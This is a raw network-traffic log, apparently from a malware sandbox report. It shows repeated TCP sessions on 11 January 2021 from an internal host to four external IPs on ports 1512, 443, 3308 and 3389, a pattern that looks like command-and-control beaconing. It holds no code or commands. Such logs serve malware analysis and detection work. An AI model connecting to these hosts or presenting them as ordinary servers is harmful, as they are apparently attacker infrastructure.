Jan 11, 2021 16:52:25.887559891 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:25.940273046 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:25.949183941 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:25.949208975 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:25.949309111 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:25.969454050 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:26.024482965 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.024821043 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:26.038769960 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:26.038872957 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:26.094265938 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.094538927 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:26.130486965 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.150027990 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.150073051 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.243313074 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.243343115 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.243642092 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:26.249864101 CET	49184	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:26.302824020 CET	1512	49184	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:26.362273932 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.414891958 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.415087938 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.416624069 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.468887091 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.483844995 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.484098911 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.498666048 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.553494930 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.553728104 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.565393925 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.565509081 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.618066072 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.618395090 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.670715094 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.788335085 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.788383961 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.788634062 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.794500113 CET	49185	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:26.846935987 CET	443	49185	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:26.908842087 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:26.952076912 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:26.952495098 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:26.954381943 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:26.997450113 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.011540890 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.011578083 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.011676073 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.011723995 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.029872894 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.074876070 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.075011969 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.086575985 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.086699963 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.130038023 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.130265951 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.170020103 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.173410892 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.173450947 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.285957098 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.286003113 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.286333084 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.292073965 CET	49186	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:27.335258007 CET	3308	49186	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:27.402329922 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.456566095 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.456670046 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.457825899 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.512531042 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.531506062 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.531574965 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.531728029 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.537152052 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.596813917 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.597064972 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.609492064 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.609584093 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.663746119 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.664017916 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.703161001 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.718878031 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.718913078 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.809552908 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.809592962 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.809814930 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.809868097 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.815447092 CET	49187	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:27.869502068 CET	3389	49187	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:27.938559055 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:27.993309021 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:27.993417978 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:27.994602919 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.049452066 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.056400061 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.056437016 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.056550980 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.057061911 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.072854042 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.126908064 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.127145052 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.136935949 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.137326956 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.190221071 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.190548897 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.228532076 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.243510962 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.243557930 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.346854925 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.346896887 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.347212076 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.352833986 CET	49188	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:28.405659914 CET	1512	49188	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:28.468563080 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.520744085 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.520922899 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.522716045 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.575078964 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.591475010 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.591662884 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.607003927 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.664369106 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.664557934 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.673858881 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.674266100 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.731550932 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.731833935 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.766432047 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.789182901 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.903228045 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.903255939 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:28.903492928 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.908380985 CET	49189	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:28.960454941 CET	443	49189	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:29.010663033 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.054352999 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.054498911 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.056685925 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.099674940 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.110596895 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.110621929 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.110728025 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.125030041 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.169951916 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.170226097 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.180676937 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.180833101 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.223815918 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.224090099 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.264137983 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.267107964 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.267128944 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.379257917 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.379287004 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.379491091 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.381756067 CET	49190	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:29.424827099 CET	3308	49190	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:29.499571085 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.553801060 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.553894043 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.554476976 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.610903025 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.628146887 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.628196001 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.628284931 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.634912014 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.696784019 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.696894884 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.701071978 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.701173067 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.754808903 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.754903078 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.794197083 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.808871031 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.808912039 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.898040056 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.898108959 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:29.898212910 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.898247957 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.913908958 CET	49191	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:29.968101025 CET	3389	49191	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:30.027693987 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.080791950 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.080903053 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.081918955 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.134907961 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.144196033 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.144222975 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.144345045 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.151432037 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.205701113 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.205938101 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.216108084 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.216516018 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.269570112 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.269805908 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.308665991 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.322822094 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.422544956 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.422590971 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.422735929 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.422780991 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.428535938 CET	49192	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:30.481514931 CET	1512	49192	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:30.539082050 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.591324091 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.591435909 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.592704058 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.644856930 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.659601927 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.659713984 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.677247047 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.731911898 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.732044935 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.741466999 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.741697073 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.793802977 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.794043064 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.846343040 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.964078903 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.964127064 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:30.965528011 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:30.977550030 CET	49193	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:31.029792070 CET	443	49193	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:31.087470055 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.130652905 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.133541107 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.135900974 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.179842949 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.192506075 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.192531109 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.193550110 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.201963902 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.246923923 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.247138023 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.256633043 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.256916046 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.300107956 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.300345898 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.339962959 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.343518972 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.343542099 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.455784082 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.455823898 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.455990076 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.458978891 CET	49194	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:31.502221107 CET	3308	49194	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:31.573859930 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.628055096 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.628238916 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.629304886 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.683187962 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.707272053 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.707318068 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.707495928 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.720891953 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.783035040 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.783296108 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.793288946 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.793523073 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.847269058 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.847603083 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.886229038 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.901429892 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.901448965 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.991995096 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.992027044 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:31.992073059 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.992091894 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:31.995251894 CET	49195	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:32.048983097 CET	3389	49195	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:32.101226091 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.154150009 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.154378891 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.155863047 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.208621025 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.215511084 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.215543032 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.215667009 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.231594086 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.285676956 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.285998106 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.295303106 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.295644999 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.348423004 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.348632097 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.388506889 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.401354074 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.401376009 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.504762888 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.504791021 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.505001068 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.510557890 CET	49196	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:32.563334942 CET	1512	49196	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:32.622364998 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.674793959 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:32.674927950 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.676224947 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.728286028 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:32.743416071 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:32.743526936 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.759742022 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.814265013 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:32.814399004 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.825656891 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.825974941 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.878330946 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:32.878453016 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:32.930766106 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:33.047183990 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:33.047208071 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:33.047343969 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:33.050148964 CET	49197	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:33.102483988 CET	443	49197	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:33.164771080 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.208079100 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.208244085 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.209827900 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.252990961 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.263684034 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.263731956 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.263878107 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.279875994 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.324884892 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.325006008 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.334589005 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.334995031 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.378298044 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.378591061 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.421873093 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.533324957 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.533353090 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.533502102 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.537672043 CET	49198	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:33.580892086 CET	3308	49198	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:33.648153067 CET	49199	3389	192.168.2.22	5.100.228.233
